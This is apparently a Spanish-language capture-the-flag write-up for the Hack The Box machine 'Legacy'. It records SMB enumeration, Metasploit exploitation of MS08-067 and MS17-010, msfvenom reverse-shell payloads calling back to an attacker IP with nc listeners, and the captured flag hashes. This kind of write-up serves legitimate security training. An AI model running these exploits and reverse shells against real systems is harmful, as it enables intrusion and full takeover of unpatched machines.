	LEGACY	10.10.10.4

++ INFORMACION ENTREGADA:
	Nombre: Legacy
	Sistema Operativo: Windows
	Dificultad: Facil.
	IP: 10.10.10.4

++ RECOLECION DE INFORMACION:

-- PUERTOS:

nmap -p- -Pn 10.10.10.4

nmap -sC -sV -A -p139,445,3389 10.10.10.4 -o nmapTCP.txt

	PORT     STATE  SERVICE       VERSION
	139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
	445/tcp  open   microsoft-ds  Windows XP microsoft-ds
	3389/tcp closed ms-wbt-server
	Device type: general purpose|specialized
	Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (94%), General Dynamics embedded (88%)
	OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_server_2008::sp2
	Aggressive OS guesses: Microsoft Windows XP SP3 (94%), Microsoft Windows XP (92%), Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows Server 2003 SP1 or SP2 (91%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows 2000 SP4 (91%), Microsoft Windows XP SP2 or Windows Server 2003 (91%), Microsoft Windows Server 2003 (90%), Microsoft Windows XP Professional SP3 (90%), Microsoft Windows XP SP2 (90%) 
	No exact OS matches for host (test conditions non-ideal). 
	Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp                                                                                                                                        
	Host script results:
	|_clock-skew: mean: 5d00h57m39s, deviation: 1h24m50s, median: 4d23h57m39s 
	|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:83:c9 (VMware)
	| smb-os-discovery:
	|   OS: Windows XP (Windows 2000 LAN Manager)
	|   OS CPE: cpe:/o:microsoft:windows_xp::-  
	|   Computer name: legacy                                                                                                                                                                                                      
	|   Workgroup: HTB\x00
	|_  System time: 2020-03-06T15:43:30+02:00
	| smb-security-mode:
	|   account_used: guest
	|   authentication_level: user
	|   challenge_response: supported
	|_  message_signing: disabled (dangerous, but default)
	|_smb2-time: Protocol negotiation failed (SMB2) 

nmap -sU 10.10.10.4	

nmap -sU -sC -sV -p137 10.10.10.4 -o nmapUDP.txt 
	PORT    STATE SERVICE    VERSION
	137/udp open  netbios-ns Microsoft Windows netbios-ns (workgroup: HTB)
	Service Info: Host: LEGACY; OS: Windows; CPE: cpe:/o:microsoft:windows
	Host script results:
	|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS

----- RESUMEN DE LA INFORMACION OBTENIDA -----

	Puerto 137	Protocolo:UDP	Servicio:netbios-ns 	Version: Microsoft Windows netbios-ns (workgroup: HTB)
	Puerto 139	Protocolo:TCP	Servicio:netbios-ssn	Version: Microsoft Windows netbios-ssn
	Puerto 445	Protocolo:TCP	Servicio:microsoft-ds	Version: Windows XP microsoft-ds
	Puerto 3389	Protocolo:TCP 	Servicio:ms-wbt-server 
	
+++++ FASE DE ANALISIS DE VULNERAVILIDADES ++++++++++++++++++++++++++++++

++ HTTP: Conexion http por el puerto 139 y 445.

-- Con la herramienta smbmap: 					

	smbmap -H 10.10.10.4
	[+] Finding open SMB ports....
	[+] User SMB session establishd on 10.10.10.4...
	[+] IP: 10.10.10.4:445  Name: 10.10.10.4
        Disk                                                    Permissions
        ----                                                    -----------
	[!] Access Denied

--Con la herramienta smbclient

	smbclient -N -L //10.10.10.4
	session setup failed: NT_STATUS_IO_TIMEOUT

	smbclient -N -L //10.10.10.4
	session setup failed: NT_STATUS_IO_TIMEOUT
	
	smbclient -L \\10.10.10.4\
	session setup failed: NT_STATUS_IO_TIMEOUT
	
	smbclient -L \\\\10.10.10.4\\
	session setup failed: NT_STATUS_IO_TIMEOUT
	
	smbclient -L \\\\10.10.10.4
	session setup failed: NT_STATUS_IO_TIMEOUT
	
	smbclient \\\\10.10.10.4\\ADMIN
	session setup failed: NT_STATUS_IO_TIMEOUT

-- Ejecutar script de smb con la aplicacion nmap:

nmap --script=*smb-vul* -p139,445 10.10.10.4

PORT    STATE SERVICE
	139/tcp open  netbios-ssn
	445/tcp open  microsoft-ds

	Host script results:
	| smb-vuln-ms08-067: 
	|   VULNERABLE:
	|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
	|     State: LIKELY VULNERABLE
	|     IDs:  CVE:CVE-2008-4250
	|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
	|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
	|           code via a crafted RPC request that triggers the overflow during path canonicalization.
	|
	|     Disclosure date: 2008-10-23
	|     References:
	|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
	|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
	|_smb-vuln-ms10-054: false
	|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
	| smb-vuln-ms17-010: 
	|   VULNERABLE:
	|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
	|     State: VULNERABLE
	|     IDs:  CVE:CVE-2017-0143
	|     Risk factor: HIGH
	|       A critical remote code execution vulnerability exists in Microsoft SMBv1
	|        servers (ms17-010).
	|           
	|     Disclosure date: 2017-03-14
	|     References:
	|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
	|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
	|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

      

-- Con la aplicación msfconsole para buscar la version de smb 
	msft> search smb_version
	msft> use auxiliary/scanner/smb/smb_version
	msft> set rhost 10.10.10.4
	msft> exploit
	
	[+] 10.10.10.4:445        - Host is running Windows XP SP3 (language:English) (name:LEGACY) (workgroup:HTB ) (signatures:optional)
	[*] 10.10.10.4:445        - Scanned 1 of 1 hosts (100% complete)
	[*] Auxiliary module execution completed

	msf5> use auxiliary/scanner/rdp/ms12_020_check
	msf5 auxiliary (scanner/rdp/ms12_020_check) > set rhost 10.10.4
 	msf5 auxiliary (scanner/rdp/ms12_020_check) > Exploit
	[*] 10.10.10.4:3389       - 10.10.10.4:3389 - Cannot reliably check exploitability.
	[*] 10.10.10.4:3389       - Scanned 1 of 1 hosts (100% complete)
	[*] Auxiliary module execution completed
	(FALLA)		
	
++ ms-wbt-server: ms-wbt-server por el puerto 3389.

	
+++++ FASE DE EXPLOTACION +++++++++++++++++++++++++++++++++++++++++

-- Comprobar la vulnerabilidad CVE-2017-0143 (ms17-010)
	En mestasploit búsqueda de exploit con ms17-010
	msf5 > use exploit/windows/smb/smb_doublepulsar_rce 
	msf5 exploit(windows/smb/smb_doublepulsar_rce) > set rhosts 10.10.10.4
	msf5 exploit(windows/smb/smb_doublepulsar_rce) > set lhost 10.10.14.19
	(FALLA)
	
	
	
///////////////////////////////////////   OPCION 1    //////////////////// 

--Comprobar la vulnerabilidad CVE-2008-4250 (MS08-067)
	En mestasploit buscar exploit con MS08-067
	msf5 > use exploit/windows/smb/ms08_067_netapi
	msf exploit(windows/smb/ms08_067_netapi) >set rhost 10.10.10.4
	msf exploit(windows/smb/ms08_067_netapi) >set rport 445
	msf exploit(windows/smb/ms08_067_netapi) >set lhost 10.10.14.16
	msf exploit(windows/smb/ms08_067_netapi) >exploit
	
	Consigue una shell 
	meterpreter > getuid
	Server username: NT AUTHORITY\SYSTEM
	


///////////////////////////////////////   OPCION 2    //////////////////// 

Tambien se puede hacer con el fichero send_and_execute.py desde la web https://github.com/helviojunior/MS17-010

Descargar wget https://raw.githubusercontent.com/helviojunior/MS17-010/master/send_and_execute.py
Ejecutar msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.16 LPORT=8888 EXITFUNC=thread -f exe -a x86 --platform=windows -o shell.exe
Se crea el fichero shell.exe

Descargar tambien el fichero mysmb.py desde la web https://raw.githubusercontent.com/helviojunior/MS17-010/master/mysmb.py
Ahora ejecutar en una consola nc -lvnp 8888
y desde otra consola  python send_and_execute.py  10.10.10.4 shell.exe 

y conseguir una shell de Administador
*Si da error de ejecucion de la libreria de impacket, ejecutar: python -3 -m pip install impacket	
	
	
	
///////////////////////////////////////   OPCION 3    ////////////////////

Descargar el exploit git clone https://github.com/helviojunior/MS17-010.git

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.16 LPORT=4444 -f exe > eternalblue.exe
	
nc -nlvp 4444

python send_and_execute.py 10.10.10.4 ~/Desktop/eternalblue.exe

Se cpnsigue una shell de Administador



++ FASE DE POSTEXPLOTACION:

FLAG ADMINISTRADOR/ROOT
C:\Documents and Settings\Administrator\Desktop>more root.txt
993442d258b0e0ec917cae9e695d5713


FLAG USUARIO/User
C:\Documents and Settings\john\Desktop>more user.txt
more user.txt
e69af0e4f443de7e36876fda4ec7644f








